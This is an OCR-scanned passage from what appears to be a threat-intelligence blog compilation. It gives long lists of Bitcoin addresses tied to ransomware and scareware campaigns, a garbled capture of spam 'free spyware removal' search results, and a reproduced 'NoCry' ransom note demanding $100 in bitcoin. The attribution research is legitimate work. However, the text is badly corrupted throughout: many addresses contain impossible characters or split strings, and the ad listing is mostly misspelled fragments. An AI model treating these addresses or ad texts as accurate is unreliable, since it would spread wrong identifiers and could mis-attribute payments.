1Pr8vrsMxsbjwSAtepZoLZdnBSmb4J4mic 
1PR8XJUPqRFBuVaV3otiwR3188nEUKzxdr 
1PRCNC16yRPlqswV6sQjECv8efd6gKiHyg 
1PRf3xx1EnPLz56wTJoDujhoLTakDYuRJk 
LPRFYZKAwC7dpEGqnGCxNTVnZNz22jWzjY 
1PRhYGpAcqmiPp8DBAq6hos4xVVae2jzky 
1PRTLCU8TGeEu42KExFuYRkij597xmPPQX 
1PS5h13Deqp99WY2csi3tQyngAJYuShSjj 
1PSdRdxi2Zx2f72XaRzJWGnbjusixti1ZC 
1PsKLDsKU34e5y4CKTW8q8g]j7kKGWrK45Y 
1Psns4LtfdsjPTtgYBiGUFfFL54f9BLHYPy 
1PSPHYmMMkCunBTQvDmSugQr4d9VbhVYCbw 
1Pt6vZmejuFxqZYch9ht1j3n8kDSihXyFo 
1PtbAG3SwEp1ljEq8q8fmYaB25AWNiwPcye 
1LPtHFvkgafTZ5tvCSgyfZNJEUGJY8bYpbT 
1PTHOKGEVyGQDHfo9tnkCw6E3Nc7ePgAL 
1PtqPBGED3LPXBDbByKWfC2tpHXHEgKmin 
1PTW4A3sdxa7FMB2ywjJqtDX5XYUtvPGtbD 
1Pub4vfnfL7fGB7HsdL9OFTGbHHnUY7bDAN 
1PuB4vvU8nhK4N7LAPHsPku9m2RKU6D6hj 
1PUcq2qJhUKMD34ZAn9v5ZR5zcyQDkS8re 
1PUFqoq1iLNzrWaQKzS1Zbdqr6vcFWwT8Xo 
1PumbJVHAHXmYKaopYuZYH4ohzcP1YwaT] 
1PumTajE9bBPuRdDibFNcoNc3W3F5Mych4 
1PUNQRYJkk84eNgbhbHo6D8h99rFxVR2eXx 
1PUt9uY7Uqy3AKBAzi96C5QRZ1ey2CyuFf 
1PuTDKuUQmYAA2fbqMaTf7rorvEWooNNVG 
1PuUj5T2MqoqHL5ENEfTtuU5 ThqgNQA54fKc 
1PUWZPMRz8vza6RAaClePCYp1qM8CNtc5f 
1PuxzG2EwavEjS6XjQsLdE4zxaFz7Y9SZ4 


25169 


1LPUywqTv7HMrgsAau6bAW87iGW2byHYPsV 
1pUz4bDWbchBVFMHn8nxkgaUZz3q9tNSs 
1PUzdhsfZekWctTFyAd8KBPe9v4GVc3QcW 
1PVEgNxfVgUWPQ6u7d1xre6y1lsnbzpL35 
LPvfNzWJmkZGaWQPQrTv19gV6CPYNLSKGX 
1PVmy3J69fVPB7UfRKHZChlaLmaEMmPnDb 
1PvxEHe44sZkKt6gXc6k37gY6pxX7SApBUyu 
1LPW3Z8Aq3qi8UgoZA3WvoGbkxLqpSRGRc5 
1PW6wA8dBwWaFbemN1tazCHUsE8nYwLMbb 
1PW9KS8T1ySvfoiS7KnwPDjQCkDi8SQDbk 
1Pw9mN2ACemrjLsB4eMH4fAAu5hnizvyEU 
LPWUpZjkK55Efa8ADD3Jnaai6XSBG1QP2p 
1PwvLm2M41S9N7U8E6fJSmtQSkK6ndkDHud 
1PwwmPQEKFT 7ECA25t7aNhe5SKaUJxFFTW 
1PWxGVmSyAVg28vMvDH5rKAY9ZriNmkRr1 
1PWxRF5EpAuP88Dpu6éfYPfv5rmaYPqpB7i 
1PwZ5wu45 TyoKrMAFr8CviUCtfnUAHRCFi 
1PWZKcRabLELNLvZVncdpeGycFyDtpfyPD 
LPWZZyQsYNzimgmMiU17v2YDHZ4N966tiS 
1px2pnCAfclsi5Zs8Dj5y5wqQ7otiNcyL 
1Px8i7fiuDEw29xDNYZMHpuGLfPz3HHZ75 
1Px8M36MwkBaDx3f46npu51FfBo41Tiy1U 
1PxAkbLEW6dj39rpTNhSYD2uJZkUrnGjsh 
1PXbhX8pC2C3e91VqB67BkKUNHVWBojG7S7 
1PxkxfwkAPWmRrVHh1AEaguHjvooEFXoJE 
1PxnRY7rpwYJM9DLahZa3yfNJsZ1D5EYpk 
1PXUjsfWs8QDYJYiQrdawTu51laZZwXVaD6 
1PXwnQhU1MgiQRcdYfRDPSMWMh9GpLbhp5 
1PxxRVWGMyQEWdqiUpXX2jx1UCaEGEjsxRz 
1PY4dY6qB3UwW4Sg4hMgNtyH95bGwvV4rrkC 
LPY4ZZM8Vvs8SKT4RuwmeVPkfuPAdDT 7pZ 
1PyAKMEpZxYF7WVKuRhgEEdZx6qtilqv6ég 
1PycDQVxawCHEJFDE3D6pAAeGYW4zPwX1F 
LPYEMcn5gWz7ZG1Ja93jnhaxwBTeb5Nvag 
1PyJ595HgFAine CWKM Tu4qAHhq6vxkisfp 
25170 


1PYjiVYUNYSGPkkgP1JLb9U2CETAKVmPRMr 
1Pyk5V6CxRZWbCLC1CmWWceogrxcTpSyYbqn 
1PyknGrUZxLByWUoUoZtABMXJibh254ZKW 
1PYL55hgouLWRh3uhAx2DjeJ3kKWwrXUWsA 
1PymdRmopE2RE34tZUNpjJq3L5mzj6hrL4M 
1PYNY8irFBH68praWpUAXwvVp8yba7EZAE 
1PYORX3RijWkGC)JjrzdfhfF VF D5tXq7ifU 
1PyPvKT4XQcLwoCUWi9FVNVjRWrJ860Qya 
1PYradNnqemmz2o0gZzhV1qRkKUQDC32NTmF 
1PyXtaBBSyYSRVHkp]cApSjwmLe31FGGem 
1PZ26a63Zgt6u8GtKsV71V8soV9e3Kh5rt 
1PZ9ONr6721rWnaEe5uiovw5KeAsY7jGJPP 
1PzdoWdMyTFo6tMtSzSSKUxSQxUnXTPxKa 
1PzfuENwPSbdhr31JZiMAPFHEQHY28n69m 
1Pzj8QF3SQXKyWNtGeWnxNbqcmVPGXrnDR 
1PzkgPdnR5ASia6MkKUYQMRNx8HX6HWLoyZ 
1PzKtef3mwBB5JkLXSPD5HG5GwiWYf78HF 
1PZMH1QKyHvwdpeUnyKzRHnDkvuyKwoDF6 
1PzpZqzRJ4aaeNr5tuGzfWR1IBZazQ8o0Age 
1PZRbVrbHb391ejHjmSeD8mn7LysjU9DV3 
1PZtQyrKMBfraTyBigK7Sk8PcsY28RZT21 
1PzZVLgK93MUj6mLggMU54HxrKEgcH68kt4 
1PZzwmD2DGAT194uiUbZxDdQWhuwMGVsr2T 
1PZZsy7GD4GiuL3NDsn7a2GoazxG5PZTp7 
1Q113ntPtng3F3Zp9iU39PaE7LkpLypZuz 
1Q139UHFbvbHixeqQfMsbuj1SX8iZ6eHEi 
1Q17i9K5cRdnpK)wMgHsxK7eBWevejadBh 
1Q18cleYcqy4gBQBtdWZmDiGKszDR7JP6F 
1Q1A7c3wFCvGhEMHe9rJsst8eH]pkmiB3R 
1Q1bPWpLAkxNPjgHHmXrhAQrFyzQQ4mmkm 
1Q1ctqinCED3e7HHPurbMw97kqP48E9agG 
1Q1xo6vkBXeoaq3Lv4cDalsTbhNPBy7cTB 
1Q24ZAsfM7yLCktAfhUzZB3UERRjvSsNDH3v 
1Q26NmseLKWuNbf6éRaNwHWjNWQ7YeEAcX8 
1Q2LMCRJDDD9I9VVJDB8M1knW3yET5cBMDLX 
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1Q2mJrYaugcwZzr9LNZtFKimczy5DhcSox 
1Q2NpW78WzogpAo3SGV7bu9nDHSReBuhgm 
1Q2rjnkKGNxwhPGJWorPjGqEFFAiEqox1fWw 
1Q2WT42)4qx1Bp49hrBsu9Wsv1SCzZM91ap 
1Q368c5GgR2engtNn9xWqZxp5bRPCWR6Ew 
1LQ3DfHTEO80ANxbiFg7KgV3Xdm300W5Mx4 
1Q3M1kLnwfnWPrJNwQYHbgugRs5yBCoU69 
1Q3pzDPuQq9EXrH64kCFXQc7JV71JtLhPo 
1Q3UvXeleteUk9FqG7yXxS7fvKwzSs94VP 
1Q3zzrPxts9PXLaTwnJohN8sg715aYbxkj 
1Q4bizZMCj1qUYxxpjPm1psAEVkcFirm1T 
1Q4CuftQ2xih1t5K42TobWXHLMdHYLq2egB 
1Q4WFPGsohzQ13XSjq7zC1tiLGQBFSNmQB 
1Q59R9YHCBdWpnj5ve4BTSi2scbmAdK3TyZ 
1Q66CkptdKoxhAGm5cZqsTCyq/7n27xHFBz 
1Q6bPaxXvekG5VletCyVdNFgMSGAK3FK8FY 
LQ6HR3SOMBUJpvQqMrénktp7S1Kw7LjWxB 
LQ6UW69NNH7P5qdMkgUpLMS7hjNxiCCfZb 
1Q6YXaBGKxxgYZuw47L4wXsobqyeoZzT1g 
1Q7EkKQPZ2UGnqwRa3yephs8yagqUrxoeH4 
1Q7FVzNCynm5yiDLyLqqS5BsSRM9HL4xjwN2 
1Q7qKVPzaEkufK4tLNpaLqn3TxGTFwTbq8 
1Q7ZFTpMsTNkyPeuopY5ghVi2DSZsbEr6F 
1Q87CRFPJTWdXbwnBi3huZgbCpu4whZ606 
1Q886hDm4ba4tUgEZWnDeLaGMHYefeb2V2 
1Q8arYbih2bgkZFV9zKpri6Qeq8yZFIGCj 
1Q8ER4Luvo6DEOMtxX6qYNCFfXSsQiqsP]t 
1Q8GiSMopiygiENnfVMCQ1vEFb68qxPENi 
1Q8otMiSJikc1DLAjPjoox59Vrzbq27qM1 
1Q80w8tG7deK]p5hssxnW1TM2Y5MYkEvNC 
1Q8rVutEc2BTeBexsxXTFrlLWnD9rPUXEAkS 
1Q8vfZ2dS9jJHVZUXX8d3XeTZ5FYRC3HDYi 
1Q8yCfqNrs2LSAxnvCnXz8dgSwY8YUeLSN 
1Q8ZGPzZLhbYG9XRMDT9IrYKXTZn3ZEWuC9q 
1LQ9CAbWL3UDeBciVxPGyBfagjwtpn6KnL6C 
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Search the wed for fapyware Search | 
List of Sites Related to spyware: 


1. Spyware 
Spyware? Finden See, was See heer suchen! 
np a inogche-engebete com ym 
Adtware And Soyware 
2 Free Spyware Removal Begun Have Spyware 
FREE Download for The Best Sofware to Protect Your PC tom Spyware and Adware Award Wintang Programs - Download Them All Now! Mecrosc® Soyware 
Ntip \wrew Free-Spyware-Doctor us Sazemare Dotter 
Sooomare Stomer 
A Seoomare Removal 
3. Spyware Remover. Free Virus Spyware Scan a 
Is your Computer acting weed? Get nd of Spyware Fast! Scan your PC for FREE. increase computer speed. Protect your computer Prevent dentty the® Scan Mus: Downloads No Spyware 
Now. 100% Money back Guaranteed 
Dttp /wew promobonhunter com 
ivi Buy Clonazepam 
4 Antivirus - Free Download Pina Cones Game 
Gat Latest Antiveus, Spyware and Firewall protection Free Download Pup World Poker Tour 
http //100tepantranus cn Cash Loans in Austraha 
House insurance 


5 FREE SPYWARE & ADWARE SCAN 
Remove Spyware. Adware and Block Hackers Download Free Computer Scan and Protecbon Award-Winning Spyware and Adware Remover - Free Download 
Dttp ww adware-clean Con 


6 Spyware 
Shop for Spyware. and Geals on tors of cther products at MonsterMarketplace 
Dtlp wren Monstermarketplace Com 


7. spyware - Produkte vergleichen mit Ask.com 
Vergieschen See de besten Frewals Vrenscarner Art-Spam und Spyware Produkte mt Ask com 
http www ask com 


8 Fin f 
Find the Best Oeats. Shop for spyware now 
http spyware Dest deals com 


9 Spyware 
Spyware? Finden Sie, was Sie heer suchert 
http \weew taegeche- angebote com 


10 id Of 
Does your computer have spyware on &? Protect your computer and get nd of ¢ now 
http \weew waryamed Com spyware him 


11. Amazing! Here! 
‘We will show you the best websdes related to Spyware 
bttp www thetop 10 com 


12, Free Spyware Removal 
FREE Download for The Best Sofware to Protect Your PC form Spyware and Adware Award Vining Programs - Download Them All Now! 
http \weew Free-Spyware-Doctor us 


Among the new monetization tactics used are the typical [20]pay-per-click malware-friendly 
search engines which act as both, redirectors to phony sites/scams, as well as keyword 
blackholes which help them assess the popularity for a particular keyword, and therefore start 
pushing it more aggressively through a process called synonymization. 


Interestingly, they’re exclusively using the compromised .co.uk, as well as purely mali- 
cious blackhat SEO domains for scareware serving purposes, but continue using the ones they 
operate under the free DNS service providers for [21]monetization through the bogus search 
engines. The domains used in this monetization approach are as follows: 
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1QA3udCcow9YamTrrAkn32whsBRyLqGSW8C 
1QAJFuxcv1tyj4HJDSqCJ9GYsSFcKAFRicj 
LQAUfDCznxmaytrbaSneeFbBcS1LANLd9aV 
1QB26YFfyjj8x5CTX4Hpx13ZnWaQdti38y 
1QB89eZhsn5VGiI5vvX4VDfL8EMALhxvr9xV 
1QBC5ezVxAuA86WeUrpdPFUMLJxx7yj26c 
LQBcHE532LENdAuXncqbXsubyPNZbj9ZVn 
LQBGQWgFRrFLvzxx3kojQYUczuEbUne6Xd 
lqbiVT6Fe6rWmv7GVf3CvaBPgsboxYKUn 
LOBNtfZ5nVobhdU6kFvv6XaL7Fq46CnwRf 
1lqbPi3yK8DMzy6S5j6CCsPPVeDQ5jTe7V 
1LQBv6HvunizHA3smbpRXoqePwNsgmkHy27 
1LQBY2Ktgaq2waVZdWafb3mQj7yJ5)J8djuV 
1QBZtskK6ib1bTCGHrrqeopQbcFro618y5S 
1QC5aNxkXcrVhLfjrcAk8J5essN8gwtnxW 
1LQCFLdQEpjZLaTyqyeZex5eC5JBAuy5d23 
1QCSSjwSoEyVS4fNbVCcjLy6g4NfgeLTF5 
LQDKCN6kKQ2v7q18JW72tVB3ZYANKfsjV1R 
1QDp42WBzRYmaUubxUbS57LdtwP5 3RiXEi 
1QDupSbzNQ6o0iZmMPHUujBNmmxnxN3VLt9t 
1QDxvdVZtBNfsleY18teayjnhSsj35WTjy 
LQE6KGjbMxcWwjAAB6TLxBTLM8pAnso7gT 
1QEc8ZduvEx9AAZGHa6jJCk9fCbVpdabeBY 
1LQEF4yDuRZGgRLcn4R50yZ5PuwgwRxSiyK 
LQEhHETnNBJeQbWi2HW37Xu4Nh3fMSVXn9R 
1LQEky9Wbxhf81poxUYWAV1TUV567dCXwB7 
LQELGLEWPQnLPTUKSrjLFzXgywGcXBKP6s 
1QEPLgzqBWya8J3CBJQXe]46MvmPpDw3Uu 
1QF27y2SsfAH5ek7sniYfukExsWwcE5izT 
LQFCKMVXWZTR4arA5GKppg8YNzpdCSzWc7 
1QFkrVgYHwiWexVnS1AW2MDCARkrzmoE9Qi 
1QG6EcroBiMdFX8MatBghRT 8w3MUrMoqmz 
1QGcESHC4GDEufssC99YZ36N57D2X8TLK4 
1QGcsems8YOCKYiY 7 QFrcEsxsGjgtEj47Z 
1LQGFrsmHCzw8Vf7GWgBjNXSYYQ3cqFdHLF 
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1QGRagfp4gZknfGwt3b2cGPv7TGyWW4306 
lagShpCjm4GqchAjpDuGDpQEBKgrE3uT2 
1QgTUQXFLETIVIVJC9Sh5A688ri2rT5hy 
LQGWv2M6YrUFd4VgAfr5 7P2y8WcwgfE22e 
1QHdLJbUZEznhhtGwRoMbKGGkBAD3aSYMG 
LQHiyNWikqU7PELkKeeV4xB1QX408ChjdU 
1QhKRZH5MWy6GoEUVieVFcHxJ4vkdWGCh2 
1QhmimFiIKNUHK63pTKekJKnSYmW4sHR2x 
LQHtrENAHGs7iiPYPc8tEIWMA8kDjamN3K 
LQHV3L1dfKW3KDtm7iAs79RJZiFoWkC5wT 
LQHyQvUSHQjkZGyvEraVcmCrvSRYm9cyFE 
1QitZEoJvoz9E8e8ig4HJaXXaULN5ZKvi 
1QJAC57yTKTSHRqQWbm9YED4knyPtQuyjJKqT 
1LQJAtV780qDwWqa7eQ8cPPExvdXW2cekKdh 
1Q)GDFbFvKGTtemMK4ZLSmGEuoZxpfeJ9G 
1QJrFP6nQ7n8aYI8iueh2e7FYa5tJHcRBe 
1QJRGFwdRYDNKrzcQtp9uMQTc7z9ajmZay 
1Q)xryHNTnTkHntkeZ6f92Svysiyh7gADR 
1QJYzdcJ3hQVR7JSA4HexDJNVYaPSWRRC1 
1QJZ3834v7eLGykEHuP5mzhnPfAnkGPKte 
1QKEKF3zXRfsFivTWfhx9BmMLQz18DUvTjt 
1QKGfeFBTAbDKR81MjmebvYU7xC4ncvL6Br 
1QKU4GgE4BDXTdno1GKocywLctipHYEHvN 
LQKWnGExyTJ4yRQjs8eh9motYX4tFrSs8m 
1QKWz60xgdoFE2X07eKcvp6NpaVw3KFF9G 
1QKyuxvWwvBdxQvdH4uBRBc56Z2xTwwfT5 
1QL2KhS6j VGFpqbgYHErHxkP4VMik7Pw3c 
1QLaciJGnTDUfLAMk2pdrwmPooTvHDmftd 
1QLDMxngJGyA3Db9TnN6HuF8kUrysQhddzv 
1QLH65j7zcZePNBHs5YyD5diG4kZVTXZre 
1QLU1GEof18Zejig904uN4jsmyk5MAnitD 
1QLU31KchEzAsjPNruEHGdThjwwyzWtabe 
1LQLXBRjqpZtEkKMVkv9jKJn1f11SUZk3st6 
1LQpmvFaiEQinEdoH6yZ1UW2JedKpjKWyy 
1QQX1AnFa4sN61yXGZmMVjx5jcQjLgNeD 
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1QXcY8NvjkGbyXdLg6LptT3SHadvYA2hxX 
1LQyygbsSKxTKUHE2mq3H74Y2a8TkKZdFpE 
LR9IgMbvM2FnRMG1U9HJT1ldupdKkK32kdfyd 
1IrdmSHhnrgqfrlLHSxGUDmF5WxdvDuHiwQM 
LRFDv6VuF 1ix2d8g5nvqnA6YiMg2wexq2 
1Rmv2gPLLc9hHewwRWJsZu5CBZtKtgZYu 
1Rp36CRZjkpVTk8qxL6tP1SMAbDhU34iR9 
1IrSRnibdp]781gh6YySYeCK6WAwcET1DX 
1IrTRUCNcox3QpZF3XECU7ehmEAkT pafgW 
LrUofjYNnzLyPjYwarettScf5AYfCJNHS 
1Rv39e1WZKBFJKVNJe529RLUIVYDpLETk 
1rxPzJJhnDGft3iuYQB63FWwYQnUcUOR7!i 
LrY LnLMycCinHAF3MymPaq5ajry5zhCtiY 
LrYWA7yJyEM5FtqGLHeGrANqRGoGkmNF7 
1s45vUK7NzZJPVDtfqFYy9CDpmdBs4BAv2 
1S8kdZxDN6No8XA65myynEYEkJQaminP8 
1SAFJ57Y4ht6qUyvRGGDUbSVKJBZDitpn 
lsawGBP6ByVsq Tua8imu5fkdbcFRYSUKB 
1SeWdvCBCE2no0Ck53q3VaJEIBECvwMoEe 
1SjGbzU60j LmMEbb4rmCC5E3dBmeWkKgcJE 
1SqAaawugfGjdN3BVVqTUAGntDP]geY5W 
1SqbbD3SDfHBA1ZhG2MF6xJGUyHBWAh2m 
1lsQrvnms2z9XnrVBdwxPvRgs4tLrDo2kB 
1SRkare3YSv1HWngGgzBidAbjityEmNqz 
IsVZfGFwC7CSFWHKKgL6L32d6Ci9iIYvyK 
1t88ZsdG5kQ5pviUKrgNzZv56MZ2aZfizi 
1th9mPTYumfdAzCevEV1dwhG8stVnRB5n 
1TKX9r5u21mjiHju5d1FV4AhAK5FTBLa5 
LTPQwhRPd 7AfmVhf2ZqnW62cDYZg5196) 
1tqEfUp3hiqRnM4jDKNWD3xvdoZv3sMVn 
1TtWehh3nfJzoG955LpijJJ 7inr3Kdcmwz 
1TVGXNJSk7rRZf7p1lbb7hHs2ZDiIJLIHLG 
1TxHcgbtirzYaFndukWo4tgFAMyjZqNiC 
1TZWHe4pfuMhctmnRp9sVqvDszq73onnu 
1lu28JbVEPw3UWbfak9VW9ZmMZYiVjac3Ak 
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1Llu3a4GQt3ne2VmjcKY9wuvkjQZ6VB1XFA 
LuaCmab9tkPEHPoWu2V6PbbvSm2AK65BE 
1LuBSS8ExymQRahfyUqAVuxF7b43Xqd1B4 
1UbZ1m8vuWod}JjHkmzk7GugrFodTTAVZ5 
1LUc5YAardxvMtDaR453W3deQnPTEE2bGG 
LUE8UkK58khVCZGvMU1ZqrHEdrLYvLGkYv 
Luetx2bAthivqTfRri7L2hwgC8ww9qLvj 
Luja95isAxe8vtRPkz4hNqs79A9XjocDM 
LUK2QWCYg3JohjFbimxPrLoEhrphiBvj1 
LULyABgVwuzVAh2ZjcTpZZxBLLHQ8Uxt2 
1LuoSH48FhHBfj37fiwzfoCZcENBGtCSkv 
LuPwFwqyYBPctdgXyL4ySJja4bFqDqGHFRx 
LUuZvMo9crLHCiB7d7QnEPZcHL638NyDL 
1VacjkD4s32WopN8k9CzTZHesTfNLeBp8 
1VDJaznt4FVJhp6Ef426dApgbTUbLEjr5 
1LvFidoWeLZ2AGFMNKkFkHvaYjpYu1l7m2g 
lvgVYqSiIQpPd8Q90FwqF 6qxXEBM1rKwUh 
lvjZyWurGeewjctgC5wjNt2vSkKmavVtkK5h 
lvrCMrFuuHpip885sPYbTVZJzgdVJY2Yg 
1VrUhJEuaMP3GPWL3ZbSXx6a3TTRWCchNY 
1VxNqNJ5DEHZuhWjyNxZEtSKCv1lsPkp4M 
Llw4wjCSmU5ZSKLiI4xV5xhNbCfUYeB6hPN 
LW7VETgeGkNobCygquaqm2uPLjjn6Z4gNn 
LwChU8sLeYjexCx5Q3Mk9PevGixYjazvm 
L1WGdBrZk8tx90mMGUpALSDGDBxjiNST70X 
LwGjkmyEg92affbco41DWNF3SifLveBJZ 
LWM9k6cNgdrX2BFoX36uuJ13gcwdsSMPN 
LWUNBxuxCyW4AfcvescMHGrnxZN6Qs6TZ 
LwvDNpuDdyixA8GyEKPASYJ9S4AcCGK6h 
LwyX6LJ4W5hUfbsF90v4wQ3s7sAX47nvH 
1x1KSaH988HjL3 1LrikKk9RybfEaJfL8ntv 
1x2sYaJYpJfDLd8F BSjeaVqMCZjRewaBz 
1X66fSZUsLidBtWyseez3sjESb2949ThM 
1x9dNeUgqmm1Au3gxuljpbUZPdztgG3NFg 
1LxFvZ3jzWeJCwm4CTz524rLHD5BAM9bSS 
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1XGBBdB9PwjbUFambTiocrCV6fZAMUKKN 
1XhR1zrriL5gQd5KmcxLjNMCR3nGobFPs 
1xHu9ab3CREh9cLvm4LkQDh669ySTjkAu 
1XndyUocE1YjC1RCXLiLDOoDBwGWTw15dP 
1XNuRTtubPkF2AhuvYC9SV1dW5jkGbicV 
1xogTBoyk44ubNiIMM2edCoCeN8E4ixwcB 
1XPLO6OPJsF87mkhuLhWpgmzK5jTR1juExj 
1xRMJSNRBkKwCLNQBn4kWjUNfCfHQ4BnEy 
1xtCSx53VP69VUAUXMFFhY63GFbZ9JSkj 
1Y7XLJvS8XFIZPrQLH8f5DONb3tdenEgj 
lyitW4wEpRGW qSiRHTexh7McxZ2Q4G3Si 
lyqlPNgfpuKQwpkbzkeLtBSvtu7dUT5eF 
lyz5VY2XUsBAsSvgFjNgAsN3ZUv3jRZLv6 
lyZkWRa7pWdVGkQYJcUhwtX9VuMcekhra 
1ZceALc8ZyZ)JXajohPf8MG5arkzj75jyw 
1ZJbgF85LshH6jEUWEb6o0xpFFX4SmgRzZ]J 
1ZKUHBvBg5QHYYH23wQ7oPHJ2PcNrhPSo 
1zqA5UzcHhQ6S82hF5Moaum3KgtP9yAxm 
1ZrpyPbPUTt9ORRVIW1yr46wWocipzZ4Nn 
1ZRWVZCC5rP2MRcemsbsGRMMmhpPhT/7qe 
1ZxhGjNP6Sgy8TA4AmMTLZ1KxGKUvZyJ7E 
1ZZJDU36vDwiQB4YvtJRlpym7J5AwdqZi 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEj7c9tkgZDqvwjcQVvjBbzUy jJ18a0ajbmN1QCbDfsZPI£G 
TILV-9pjiu3Jf£nbCXbI6Vhu0XVo3wwLZ9r4UWDBr6ay0PHayl APT 


18.10.6 Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction 
IDs and BitCoin Addresses - An OSINT Analysis (2022-10-25 16:32) 


[1] 
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NoCry Decryptor 


Ooooops All Your Files Are Encrypted ,NoCry 


Can I Recover My Files ? 


Yes, You Can Recover All Your Files Easily And Quickly 


But How ? 
Send The Required Amount And 


$ I Will Send The Key To You For Decryption 
Your files will be lost on : 


See You Soon (0_0) 


About bitcoin Send $100 worth of bitcoin to this address: 
a a 
Pe oe oy ORE Obitc OIN Fittask425p26oRédTax6gc4nkoKn@aiVwk 


Dear blog readers, 


I’ve decided to further extend the ransomware themed BitCoin transaction IDs and BitCoin 
addresses obtained using public sources post series with the idea to assist everyone in their 
cyber attack and cyber campaign attribution efforts. 


Sample list of publicly accessible known ransomware themed BitCoin transaction IDs and 
BitCoin addresses include: 


112WED5uHhY1laiSaWAzgeMDaCKFcCvj9Pn 
113i99LGHX2ZzBed1SaMpnqb6ruRgbBwMc 
114TqaapeRvrQzuwsxQHxLWsg7uYWewx3c 
115SJrbKZujZujQJpJGBEJMzriLybnXVEu 
115ncTmF1r86UqgNVNiuTbSrg36C9WpbQyg 
115p7UMMngoj1lpMvkpHijcRdfJNXj6LrLn 
11mBErpPx1pJNQyLnZDOoNwVxhqTwTeHfU 
121PMq3EepHkZyUxRoBBMUwrr6vkXdsyFp 
122YcyXExdCbRx7Kdj6GD5ccCmoGgxB3q7 
122YgLP4YjnfwxJtCc3Kx6NQWh2nu7evfm 
123PnNatuNpuXPfodNdRRmMWMEAoaTMH8V1 
124MQoF3Ke04m7D6fVYBXCAczPeNX23tRf 
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124srvGnUNzg 1AAiXYgoQj2PwocehAJLX9 
125DQSTKMArzmkBUfoj8GLPsR25ypby6Xz 
125DiUeg9dQ4LXfTJRYaSafYADWPawooEd 
125EwHm5Epaxay8A3NWtVTcloKmHVRsnDu 
125earjdxmmE8Yhszv4dqmrH3jUzSG9DJH 
126iRhq8rAKHo7W3euvuCnJ4FoQZHTpGWr 
126sk8mK4pKPGStciNssscEoEU8eeiqoUV 
127wN6KNKCdVPvBRHh6JHasm3r4cjjFPBR 
1281wYddK6MnH8Mez3TjbgyMSBsiVysFvJ 
128MFXWRodVME4mqkK3mG9JPn7r6QSWBNKC 
128mMeNE6VGJqDX4H66bdugPCTo9DbhD7H7 
1280sATiSntnrYFfkqFLQFB9MhfQLPm2rF 
128ysDbjWMSFcWr8XvEncZvMv2twkpdb23 
129hcWZ3v9aC7qWworqHN6WijYiFSDSbVcB 
12A6maPgZrVKPUE8HnZKdo68ssxoDNxpop 
12AoTWahn6ryPbRHUJsibDvXSHMeZZz2AT 
12CF9gUTUdpVt93stRw5RdfEhvbGtsSDsF 
12CbaA23UwiGCL9h9fogjrFgM7vTBNf7go 
12DEX1ynovnDVwXJ55hkVWQdE8E7gVFHQk 
12DXgDMA8Qt4jLtnPsvPBXMciZHhVaWNKa 
12EnPxbzbEUQW 9t9fYAdOGAU5PrWXZtPB 
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153kFR/JV8FNmME73MXJVCHvTakwnwbqkgZk 
1547zgj8pGoW1W9Y1xYiB54M48D1PFUbNW 
154TcZEWHEX8Sx8QeifxKF4mhqwXBKNiVt 
1540TbsYumMN2bL8uJFHQRO5SiBWJDUrwf8e 
154zapAkUibVxh3Eda4tmwjmqxXxQ5KvdnC 
155REExRXe5eLheuQBQCx7cboKvCWX397Z 
1579cqQiioejgVQhHBRiIKBKEKg27DQxFC6b 
157G1s50AkUaLztn40b385QMwVh9x69kSG 
1583yCf9EGCDmkTFtaZxXxRaFYoBg4DUvqM 
1589trxA7M8Rk9463rMd686FBCm94z1d3C 
158KGsVMPru6XPtU5ATTRMm54VfTKfeZo7c 
15Ad3bbHJQMtz3BzbrPaFc8SZDoyR2CKY1 
15BgqU8w1JHFUN9ZF4G8EkG8YqGuypUHHk 
15BWA67iT8HY7GKxSuzc5bsSmx1loWNvqzt 
15C1BBDidkBVx72Ai4akeTvMinQAxv1M3D 
15C)]xcwJzKcLOwZLPhf8aRdT1ZiJoel4xf 
15CgPvNddhzXmcr6Br7myw8w2ofj8nDkgx 
15CteiEzmsSjYjtitksqwfXavCTAWETgxs 
15DF8fZ1MtmeT5adclgqfDgot3pKridCwwb 
1L5DTYRZqgbRIsZfBcvVzjcnCh22VTF46iWW 
15Df8WmZ5s5ncow30jA5Xg5An2vdofjxh4 
15EHJmrtoNJDWcXnzeoHDZA1G3jGKTDu2C 


25187 


L5ESEwgwo4ZSUMaeyqqUwAUxozcjbopux2 
15F4h2UuUUGxGeSauWViwXc8VeYawaeA9d9 
15FP92j1dDewYLHQdhwjevnyR5zPgepFVH 
15FyNgSrBsQHTtA8HBvCv5jnEmPdArNc2W 
15GD5Zo7fEdCmA1xRghyapFyQn2fA53EWK 
15H8BTPsMugWdu9eFfP85EXnk7EtXPCEwc 
15HZpy1BrbfvXdvJPgbvVw6VRWkcrTL449 
1L5HjxzXszTQFUXoKKZeGPPCwrtyWvdWgYK 
15Hsog6cd4RDnsSWFaWbNpCT2pDP9ASaLA 
15JCcZ1k4pWVfuSUgqPT6VojdhiFaKEKujC 
15Jh118gspxstlaw28bWFTvtoBoi7Z8ykxX 
15JwDhu2PVNWLo2JQ67pVN83rarj51xLos 
15L3MjWgduuMQzFXPzgtTDLTTvXrwJ81sw 
15LNdZ3zrxrFA4Jw4Q51vfjHzmb4xuUoqw 
15MV2CVDL1IsWXADCunkJ8WN3AmyYxRdjujc 
L5MhER5y2RVkcW6wrdY6WagelsCrp8jz6K5 
15NREgp1VhvkCpuheAJkoxCXKMXS1aPyem 
15PGUuapwTRhPTVcCTaNDX3bYgjNDdKoTk 
15PJZoaMxjoTNfPdvwNKPGy4vi1zb5fy2ar 
15PKhgWijsfXbbisrYT23NTBBFV5dwF9gKy 
15PbSGNsCzn6QxA2LyYcHzZduvvLxNned4 
15RX5SKQAvCnpLZpW4wd93NfEgkKw1lDmudp 
15RkYwCkLdhskKxBkYodHk9xTKg4mfwV5dZ 
15RkKWRAZE1FeCD2rxWJW5ya54ShyM4iiHE 
1L5SNY5L6b58FWQNB30xRMrPxDTs5nioRdf 
15TUWbycJsvw5MGfApS6Ux4tAgL3ag2aNj 
15Uqyy4a1lLMdXeqG6KLhEE4FaYqPBon5ch 
1L5VBt1ltp77zYK9n34cijnNdmgCd5E1NEJG 
15VLNcbohAKUqNQL9fM7kLdmNkZJnaR7EH 
15VQusttuqsCNDZAUDWS4nLvGA]w7JWJSd 
L5VbTT5KYiaN27293bzjBbpAqNm6HCv83e 
15VmaNUYiWykcut49k8p9F6XPkZuzBfvts 
15W3YEu2uEErs2ckB8utfDRHL3egsWSuBX 
15WUYqKerTtxi4rUEmnakw5gRMkr3nZCQd 


